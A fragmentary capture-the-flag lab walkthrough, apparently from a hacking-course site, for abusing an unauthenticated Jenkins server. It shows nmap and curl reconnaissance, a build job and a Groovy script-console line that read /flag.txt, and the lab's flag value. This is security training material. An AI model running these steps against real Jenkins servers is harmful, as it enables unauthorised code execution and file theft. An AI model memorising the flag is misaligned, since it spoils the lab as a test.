Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
nmap -Pn -sS -sV -p- <target-ip>
nmap -Pn -sS -sV -p 80,8080 --script=http-title,http-headers <target-ip>
curl -I http://<target-ip>:80
curl http://<target-ip>:80
curl -I http://<target-ip>:8080
http://<target-ip>:8080
cat /flag.txt
, which will output the flag when the job is executedStarted by user anonymous
Building in workspace /var/jenkins_home/workspace/BuildMe
[BuildMe] $ /bin/sh -xe /tmp/jenkins1234567890.sh
+ cat /flag.txt
fe35b52a-165b-4067-8aaa-ddef7d068ed4
Finished: SUCCESS
fe35b52a-165b-4067-8aaa-ddef7d068ed4
curl http://<target-ip>:8080/flag.txt
println new File('/flag.txt').text
This type of misconfiguration is commonly found in real-world environments and has led to numerous security breaches:
This challenge demonstrates a realistic attack scenario involving:
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.